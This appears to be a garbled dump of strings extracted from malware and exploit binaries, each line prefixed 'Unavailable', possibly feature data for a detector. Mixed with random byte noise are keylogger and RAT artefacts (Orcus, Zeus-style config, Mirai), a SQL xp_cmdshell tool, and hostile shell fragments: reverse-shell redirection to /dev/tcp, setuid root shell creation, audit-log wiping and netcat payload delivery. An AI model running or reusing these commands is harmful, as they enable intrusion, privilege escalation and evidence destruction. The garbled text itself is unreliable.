Unavailable \x00soul\x00\x00installdll.dll\x00\x00_one.dll\x00_fra.dllcrtruntime.logprod.tproe.tburn\\liveupdata_mem\\
Unavailable @thh
Unavailable f'8v
Unavailable causes: firewall,machine down,dcom disabled\\not supported,etc.7\"7(7/7>7o7]7o7w7@p
Unavailable nan(snan)
Unavailable k2!h
Unavailable mql;yb
Unavailable imc4
Unavailable 1*#q
Unavailable rlaazr
Unavailable @echo off
Unavailable mhnat
Unavailable \$0e
Unavailable f?01wb
Unavailable n>*$
Unavailable ea`l!
Unavailable m_vnc64
Unavailable |rys"
Unavailable suvuwvrqs
Unavailable *~}t
Unavailable 3?ks\i
Unavailable `*ismu
Unavailable vst%d.%d.%d.%sw7%d.%d.%d.%scmdshell closedmput over&binglecreate wpipe failerrcom0\\/*<>|timeout & quit!!!ewr:m:s:h:p:t:b:d:n:w:x:g:k:
Unavailable l<e4
Unavailable projects\\nadzormodulesnadzor\\nadzor_sln[injectpe] svcname=%s[
Unavailable multibytetowidechar
Unavailable ufunctionsu
Unavailable fd9a
Unavailable )|kh
Unavailable \i"3
Unavailable evverclvid.exel2r8ix
Unavailable `x,j
Unavailable iofreemdlkfreleasespinlock<shortdescription>keystroke collector</shortdescription>this plugin is the e_qwerty kernel mode driver for logging keys.</description><commands/></version><associatedimplantid>20121</associatedimplantid><rightsrequired>system or administrator (if administrator, i think the driverins<platforms>windows nt, windows 2000, windows xp (32/64 bit), windows 2003 (32/64<projectpath>plugin/collection</projectpath><dlldepend>none</dlldepend><minortype>0</minortype><pluginname>e_qwertykm</pluginname></comments><comments><majortype>1</majortype><files>none</files><poc>erebus</poc><team>none</team><?xml-stylesheet type=\"text/xsl\" href=\"../xslt/pluginhtml.xsl\"?><pluginsdepend>u_hookmanager v1.0, kernel covert store v1.0</pluginsdepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsiwarriorpride\\production2.0\\package\\e_wzowski<!-- edited with xmlspy v5 rel. 4 u (http://www.xmlspy.com) by team (renegade) -<configfilename>20123_cmddef.xml</configfilename><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
Unavailable ~~*"
Unavailable z5~h\
Unavailable tdl+
Unavailable d>(j
Unavailable :$:+:2:9:@:g:n:u:\\:s:6%6+606<6h6m6\\6b6g6v6}68\"8,818;8@8j8o8y8^8h8m8w86 6'6.656<6c6j6q6x6_6f6m6t64\"4)40474>4e4l4s4z4a4h49\"9+91969?9e9j9s9\\9a9j9p9u9~99\"9'91999c9h9r9w9a9f9p9u94\"4(4-4<4b4g4s4_4d4s4y4~46\"6'6,6=6b6g6x6]6b6o6{6?\"?/?4?b?g?l?y?^?k?p?}?3)31383>3c3l3r3w3c3i3n3w3}3;&;+;5;:;d;i;s;x;b;j;t;y;='=,=6=>=h=m=w=\\=a=m=r=w=:!:*:/:9:>:h:p:z:_:i:n:x:}:3$3.383b3l3s3z3a3h3o3v3}3<$<.<3<=<b<l<q<^<c<m<r<|<31383?3f3m3t3[3b3i3p3w3~39!9(9/969=9d9k9r9y9`9g9n9x9:$:*:/:8:>:c:l:u:z:c:i:n:w:|:
Unavailable jrgb
Unavailable >kb|
Unavailable wia3h^
Unavailable rbf;\$,
Unavailable wq<g
Unavailable \\browser.exee
Unavailable wpvq
Unavailable 0fa#
Unavailable messageboxax`
Unavailable this program requires win32this program must be run under win64y_j
Unavailable $:"`
Unavailable 2pnm
Unavailable nf+a
Unavailable eq-g*
Unavailable gvnf
Unavailable yitj
Unavailable l$&@8t$&t0@8q
Unavailable run error!time out,change to mode 0myname--is:busybox iptables -a input -p tcp --destination-port 7547 -j dropbusybox iptables -a input -p tcp --destination-port 5555 -j drop/proc/net/tcp/dev/watchdog/dev/misc/watchdogpmmvfgdcwnvomvjgpzojfkrassl3_ctrl210765qllw;;;;;;get /mirai/dvrhelpertran duy linhdlc corporationdw20.exel
Unavailable 1gpict
Unavailable ltsh
Unavailable d9|$
Unavailable lxy|
Unavailable 9u[>
Unavailable ;lrb
Unavailable qylj
Unavailable 34$cnc
Unavailable t$1h
Unavailable 00dc5
Unavailable rsrc_htmlhwpfilepathcheck.dlladobearm.exeopendocumentexepath: %s\nxlspath: %s\ntmppath: %s\nscvrit001.batxc123465-efff-87cc-37abcdef9[
Unavailable %ag'
Unavailable xo8p
Unavailable =oo<|bq%}~3\
Unavailable m3?=6
Unavailable 6pb:k
Unavailable foc;
Unavailable (>8c
Unavailable a^a\_
Unavailable d19fc0fb14be23bcf35da427951bb5aeurl_loader=%surl_webinjects=%surl_tokenspy=%sfile_webinjects=%smoneyparser.enabled=%uenable_luhn10_post=%uinsidevm_enable=%udisable_antivirus=%ucommand= raw_input(\"enter command: \").strip('n')print '[-] (failed to load moduli -- gex will be unsupported.)'print '[-] listen/bind/accept failed: ' + str(e)chan.send(command)print '[-] ssh negotiation failed.'except paramiko.sshexception, x:&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s%s @ %supload keylogs
Unavailable hsvw
Unavailable 00dcb
Unavailable |/:zas
Unavailable pklite32 copyright 1
Unavailable getmessagea
Unavailable rl9e
Unavailable 8l0u
Unavailable a:u3ibr&
Unavailable ####@########@####
Unavailable wwpack32
Unavailable lca<a
Unavailable sh8#d
Unavailable @9f>
Unavailable h00dc
Unavailable n.u^9
Unavailable rj)4
Unavailable fb9<bu
Unavailable /f%/
Unavailable w&|.
Unavailable dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
Unavailable le4"
Unavailable dmf_x
Unavailable regopenkeyexw
Unavailable %qjn
Unavailable __unaligned
Unavailable the variable '
Unavailable wuzf"q$'[
Unavailable k\=bl
Unavailable o<nt
Unavailable g(ss
Unavailable #}x=s
Unavailable f;\$@
Unavailable wsprintfa
Unavailable \$hl
Unavailable %)mj
Unavailable 8hay
Unavailable n=t&e
Unavailable w|7o
Unavailable :ij;
Unavailable @}m`
Unavailable t[`b
Unavailable ca,g
Unavailable fh1i
Unavailable +rf(z?
Unavailable +pg)
Unavailable nw(lb
Unavailable 2wxmc&
Unavailable h264
Unavailable `eh vector vbase constructor iterator'
Unavailable dsy!
Unavailable pecompact2
Unavailable k/u
Unavailable bzbk
Unavailable `scalar deleting destructor'
Unavailable <=vn
Unavailable {flat}
Unavailable pqo!4
Unavailable usqwrv
Unavailable 5\';
Unavailable 0.!5z
Unavailable oeynq
Unavailable qko5
Unavailable jzo$l2
Unavailable y]qg
Unavailable :zs>
Unavailable ho:en
Unavailable w-kr
Unavailable t$(d
Unavailable 1uw{
Unavailable kernel3p
Unavailable 5h40l1n
Unavailable |<;r
Unavailable upx!%2d%2d%2d%2d%2d%2dz%4d%2d%2d%2d%2d%2dz/tmp/.javaw
Unavailable jf7=
Unavailable pdvzk6v
Unavailable initcommoncontrols
Unavailable :rsizb
Unavailable 9887___skej3sdhaha123
Unavailable riaaibkr
Unavailable vkvs),`ok
Unavailable t$ d
Unavailable flogon failed. kerberos ticket not yet valid (target and kdc times not synchronized)[-] could not set \"credentialtype\"-xd = dump archive data & store in scancodes.txt-
Unavailable c_l0q
Unavailable dtved
Unavailable d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbguiwang!@#9bd*-a add user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
Unavailable !f*8
Unavailable 5u0n
Unavailable w.exe
Unavailable shareware - exestealth
Unavailable jpic.gov.sya
Unavailable 3select * from win32_shares
Unavailable dk)l'
Unavailable a7fr.
Unavailable svwuh`p@
Unavailable u+h9
Unavailable t_>on
Unavailable t$ watauavawh
Unavailable february
Unavailable "xz[
Unavailable &wtt
Unavailable 0&_=
Unavailable h4zc
Unavailable rs~<
Unavailable q2y%4
Unavailable _go=
Unavailable x2!5
Unavailable ya*t
Unavailable hori6
Unavailable ~$$n,\
Unavailable _orien executable files protection systemuwvrqs
Unavailable virtualalloc
Unavailable i:p$
Unavailable yr%@
Unavailable kxh;
Unavailable "#{>
Unavailable i>q2
Unavailable d$$p
Unavailable qo)[b
Unavailable hlsc
Unavailable l<0*
Unavailable d$hf
Unavailable =s15~u
Unavailable ay)yv
Unavailable t-a;
Unavailable {lh]
Unavailable 8{?b
Unavailable &}*-qd
Unavailable msger_install.dll
Unavailable pa<a
Unavailable .wzk
Unavailable d$(d
Unavailable |q~z
Unavailable j&{n
Unavailable bpiq
Unavailable ^cse
Unavailable sh,!@
Unavailable rzidi_icon5starter.exewmifw.exesoftware\\rartmp092.tmptemp1.exeviotto keyloggermsvbvm60ftpputfileavba6c:\marijuana.txtsirc4
Unavailable 5z/3
Unavailable t$4h
Unavailable robb[]kp?r
Unavailable k7e{
Unavailable u:jt
Unavailable \\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sviewers5
Unavailable accept-language: zh%d kb/bps|%d%%{!}drz{!}user-agent: uploadorsteamappdata.vdfloginusers.vdfconfig.vdfj
Unavailable tcyi
Unavailable ^=/e
Unavailable 5d{m
Unavailable |qlg
Unavailable fe)s
Unavailable o0nz
Unavailable epe: encryptpe v2.2007.12.1, copyright (c) wfs
Unavailable -/{8
Unavailable unrealizeobject
Unavailable ,gzg
Unavailable ~?x>
Unavailable ;ddreu&
Unavailable [enter][control]modules\\exploits\\littletools\\agent_wrapper\\release... get header fatal error !!! %d bytes read > header_sizei
Unavailable u$hr
Unavailable pv.|
Unavailable deletecriticalsection
Unavailable findclose
Unavailable vnx~
Unavailable \$hi
Unavailable downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. 
exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 
(compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
Unavailable msie 5.5;\
Unavailable r>/b
Unavailable i2)s
Unavailable ntdll
Unavailable e@[^]
Unavailable h<=d
Unavailable gs:z_oe
Unavailable <zhs
Unavailable ct3y
Unavailable xsvt
Unavailable pdnb
Unavailable changing the code in this way will not affect the quality of the resulting optimized code.
Unavailable )wtc
Unavailable }ph+
Unavailable t$pi
Unavailable gvn0
Unavailable j*wm
Unavailable \10$
Unavailable f90u
Unavailable w}&?
Unavailable ewa;
Unavailable a84.u
Unavailable `@tj
Unavailable rtllookupfunctionentry
Unavailable h4;d
Unavailable 1n5n
Unavailable =lre
Unavailable q2s.
Unavailable t$@l
Unavailable gqhpp
Unavailable iowriteerrorlogentrykeremoveentrydevicequeuesesingleprivilegecheckiobuilddeviceiocontrolrequestkeremovedevicequeueiofcompleterequestkeinitializespinlockmmisnonpagedsystemaddressvalidiocreatedevicekefreleasespinlockfromdpcleveld
Unavailable $tvr
Unavailable _y)j
Unavailable 2a,lc
Unavailable portions copyright (c) 1983,97 borland
Unavailable =1#v
Unavailable #'00dcj
Unavailable o)q,h#
Unavailable =jv8
Unavailable a2`ij1
Unavailable 4,@a
Unavailable 0a^h
Unavailable ty@8p
Unavailable rpbh
Unavailable http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
Unavailable :q|f<
Unavailable i>#*q6
Unavailable elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
Unavailable i.=)7
Unavailable ;?k;
Unavailable |$ d
Unavailable z[y^
Unavailable stack memory was corrupted
Unavailable 0ebq
Unavailable noobyprotect se 1.1.8.0
Unavailable kill you%4.2f kb
Unavailable |$`ss
Unavailable zeu[j,(
Unavailable odiz
Unavailable qqqqqs3
Unavailable eykqc nh
Unavailable kz\j
Unavailable internet connect failed!woodtale technology incflyingbird technology limitedneoact co., ltd.amazgame age internet technology co., ltdemg technology limitedzemi interactive co., ltd337 technology limitedrunewaker entertainment0ncproxyxlluniscribe.dllws2_32.dlljdnsapi.dllx64.datlspyb2excalibur\\bin\\shell.pdbb
Unavailable v1.0---------------------
Unavailable thursday
Unavailable exe.tsohcvsexe.ssaslexe.rerolpxeexe.erolpxeiexe.23lldnurexe.dmcexe.llikksatlld.23lenreklld.esablenreklld.esabtpyrclld.trcvsmlld.lldtnpaehssecorptegsserddacorptegayrarbildaolteslortnoctnerrucnur\\noisrevtnerruc\\23metsys\\\\23metsys\\nib.elcycer$%toormetsys%a
Unavailable <&>v
Unavailable kc{8
Unavailable w|:yi~
Unavailable y7.x0s
Unavailable "#lq
Unavailable e3lh
Unavailable t~e3
Unavailable `vector constructor iterator'
Unavailable unsigned
Unavailable f4@"h
Unavailable 6dnfg8upn5fbzggj8licqhblqvlnuy19z5zcnknfdsdhuzui8otesbodrzfcqckr/safe/record.php_rm.battry\x0d\x0a\x09\x09\x09\x09 del %sext.orgappdata\\local\\temp\\micromedia\\mediacenter.exe\\projects\\c#\\sayad\\source\\binder\\obj\\debug\\binder.pdbdelphinative.dllsqlite3.dllb
Unavailable t$$f;
Unavailable ;m=bz
Unavailable lz5m
Unavailable vguc
Unavailable j`h`
Unavailable ihb&%
Unavailable ;ayg
Unavailable d6hq
Unavailable chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dtransitstorestr = 'echo -n \"%s\" | store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, var_name)the nopen-args provided are injected into infile if it is a valid -i do not autokill after 5 hours__strtoll_internal__strtoul_internalefdghijklmnopqrsutg8hcj hcf lcf0lcnghhcj0hcf@lcf0lcn8hgetexecnameinvalid option `__fpstartghfijklmnopqrstuvxwhttp_referer=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=crononceframe&cronk=cronv&croncommand=%2ftmp%2ftmpwatch&time=12%3a12+01%2f28%2f2005
Unavailable z;l232
Unavailable u-xv
Unavailable cast to smaller type causing loss of data
Unavailable yj;b`
Unavailable )=?a
Unavailable d$xl
Unavailable i{y3
Unavailable rz"p
Unavailable +--x
Unavailable nscortr.dllnscortr1.dllsina.exewrite file ok...error: can not open socket....error in parametrs:usage: @<get/put> <ip> <port> <file>error: not connect...connect successful....clnt <%d> rqstd n ll kllclnt <%d> rqstd swapcld nt sgnl prcs grpcld nt sgnl prntork error/var/tmp/gogomyfilename= |%s|mypid,mygid=mypid=|%d| mygid=|%d|/var/tmp/taskmydevname= |%s|
Unavailable d$`e3
Unavailable atavawh
Unavailable xogt
Unavailable - z.0
Unavailable `tek
Unavailable 2gm2
Unavailable all rights reserved.
Unavailable \\\\
Unavailable f{d+
Unavailable ycadc/kr rst`h
Unavailable fjpn&y
Unavailable ?c{^$
Unavailable zkh&e8p
Unavailable r_!g
Unavailable f'':
Unavailable hp77
Unavailable "td9
Unavailable u#_'
Unavailable d,a(
Unavailable t(d;
Unavailable df{lm9w{zzqw`}{z.4_qqd9ux}bq
Unavailable f$toj
Unavailable $<8+
Unavailable ~__tm
Unavailable id-ce-keyusagekey usageu
Unavailable x0*u
Unavailable `otdu';
Unavailable ury5;
Unavailable ppm{
Unavailable )9s5
Unavailable ^zv<
Unavailable &mqo
Unavailable ]^sp
Unavailable }hgj9
Unavailable dest
Unavailable )5s^
Unavailable g9jz
Unavailable dlum
Unavailable yl vi
Unavailable @5re
Unavailable _u,l
Unavailable aceaz
Unavailable d$8%
Unavailable hnetcfg.hnetgetsharingservicespagehnetcfg.icfgetoperationalmodehnetcfg.icfgetdynamicfwportshnetcfg.hnetfreefirewallloggingsettingshnetcfg.hnetgetshareandbridgesettingshnetcfg.hnetgetfirewallsettingspagei386\\desertwinterdriver.pdbperforming ur-specific post-install...timeout waiting for the \"caninstallnow\" event from the implant-specific exe!straitshooter30.exestandalonegrok_2.1.1.1m
Unavailable %w"%
Unavailable 0.@p
Unavailable 6pnr
Unavailable fqh2
Unavailable }na'
Unavailable lwizvmfejikcinzqndi
Unavailable $lhar
Unavailable i('k
Unavailable getlocaleinfow
Unavailable u" "
Unavailable z0xcw'
Unavailable mos=
Unavailable ve.u
Unavailable l$@d
Unavailable jg[ru
Unavailable 7uvo
Unavailable p:ak=0#d
Unavailable ty w|
Unavailable software\\microsoft\\windows nt\\currentversion\\svchostregsvr32.exe /s \"%s\"help and support%systemroot%\\system32\\svchost.exe -k netsvcssystem\\currentcontrolset\\servicesd
Unavailable vaig
Unavailable @tcpffbpiavwritememinjectoravremotethreadavcommandcontrollerfoxcon@foxcon.cominstallerfromdll.dllbzh91ay&s
Unavailable f;\$ds
Unavailable f+nw
Unavailable k&>.yc
Unavailable #uxjn
Unavailable @f`t
Unavailable )ipv
Unavailable pphr
Unavailable @80t
Unavailable stubpath
Unavailable x'ex
Unavailable ;xoz
Unavailable &|1g
Unavailable coq7
Unavailable #ib?
Unavailable .textbss
Unavailable -,(4ab;
Unavailable khcb
Unavailable __int64
Unavailable swh\
Unavailable wg@e
Unavailable ^*t81
Unavailable \\release\\bypassuacdllw
Unavailable >mzt
Unavailable vws4
Unavailable emh<g
Unavailable xxx]h
Unavailable fugf
Unavailable q]k$
Unavailable w4^t6q
Unavailable t$li
Unavailable g(z}
Unavailable }?9'
Unavailable ryg@@z
Unavailable :3ef
Unavailable [f7u
Unavailable +>_+
Unavailable \$0a
Unavailable \$(h
Unavailable {%#'
Unavailable i-tz
Unavailable %rxp
Unavailable ^az&
Unavailable %uuuu3
Unavailable dl9;hl
Unavailable 3c3%
Unavailable h~p'
Unavailable @sda
Unavailable loadlibraryariff
Unavailable ev@t
Unavailable b|x0;
Unavailable 36,>
Unavailable ch,b
Unavailable deletesubkeyget_machinenameget_usernameget_lastwritetimegetvolumeinformationosfullnamedownloaddatafm|'|'|nd|'|'|rn|'|'|sc~|'|'|scpk|'|'|cam|'|'|usb video device[endof]rs|'|'|proc|'|'|k|'|'|rg|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]p[endof]orcus.commandmanagementorcus.commands.orcus.config.orcus.connection.orcus.core.orcus.exeorcus.extensions.orcus.installationpromptformorcus.mainform.orcus.native.orcus.plugins.orcus.plugins.dllorcus.properties.orcus.protection.orcus.share.orcus.sharedorcus.staticcommandsorcus.utilities.\\projects\\orcus\\source\\orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.ziphvnccommunicationhvncactionhvncdesktoprequestkeylogcommandget_keylogfilelivekeyloggercommandorcus.staticcommands, version=prepareorcusfiletoremoveconvertfromorcusvaluekindboot.ldrd:\\workplug2.5plug3.0shell6gulp
Unavailable g+[m
Unavailable d;}l[$
Unavailable ?_5f}1
Unavailable create`
Unavailable getconsolecp
Unavailable b00dc=
Unavailable o9`m
Unavailable x01wb
Unavailable t5lcf
Unavailable !,x< w
Unavailable opera.exe
Unavailable usvwatauavawh
Unavailable \\systemroot\\c
Unavailable )#~_
Unavailable ( 8px
Unavailable t5e3
Unavailable a0`'
Unavailable mhr*
Unavailable proxy_info: automatic proxy url => %s proxy_info: connection type => %d proxy_info: proxy server => %s proxy_info: bypass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
Unavailable ph5u
Unavailable /m225n4k
Unavailable \:,>
Unavailable shlwapi.dllsetfilepointers
Unavailable getting portname/identifier failed - %xserialadddevice - error creating new devobj [%#08lx]external naming failed - status %x------- same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userportindex: %dcould not report legacy device - %xentering serialgetportinfo'user registry info - userport: %xioopendeviceregistrykey failed - %x kernel debugger is using port at address %xrelease - freeing multi contextserial driver will not load port'user registry info - useraddressspace: %dserialadddevice: enumeration request, returning no_more_entries'user registry info - userindexed: %d\
Unavailable d$$pv
Unavailable rah]v
Unavailable ify
Unavailable 8jt/a
Unavailable iqsf\hy
Unavailable 4,8
Unavailable l1ofd
Unavailable *&~^%@0hh8979&*^*@~^%9?i0hhostname: %s\x0d\x0aip: %s\x0d\x0aproxy: %s\x0d\x0auser: %s\x0d\x0asystemdir: %s\x0d\x0aos language version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0ahostnrme: %s\x0d\x0aip: %s\x0d\x0aproxy: %s\x0d\x0auser: %s\x0d\x0asystemdir: %s\x0d\x0aos latguage version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0a84ll7r"zz*+%+48l8rll7+-{"z
Unavailable |*yx
Unavailable n[3+
Unavailable mf[~
Unavailable cryptdll.dllmd5initmd5updatemd5final
Unavailable </requestedprivileges>
Unavailable hhtc
Unavailable uprh
Unavailable tg5mc
Unavailable pa'^
Unavailable !'k <}h
Unavailable 7gjc)
Unavailable z08n9
Unavailable k[np
Unavailable s2}y
Unavailable d$h3
Unavailable |$43
Unavailable @]&@
Unavailable /w;f
Unavailable fu5slhj
Unavailable bi* v
Unavailable hlec
Unavailable ua}hg
Unavailable mnmx
Unavailable 1d\,
Unavailable deh1
Unavailable ug6%
Unavailable {0112-cras8468-
Unavailable 95000000990000009d000000c3000000c7000000cb000000d7000000e5000000install_exe.exe
Unavailable #['o
Unavailable tsworkspaces.dll%
Unavailable r=nrbgd.
Unavailable tvmj
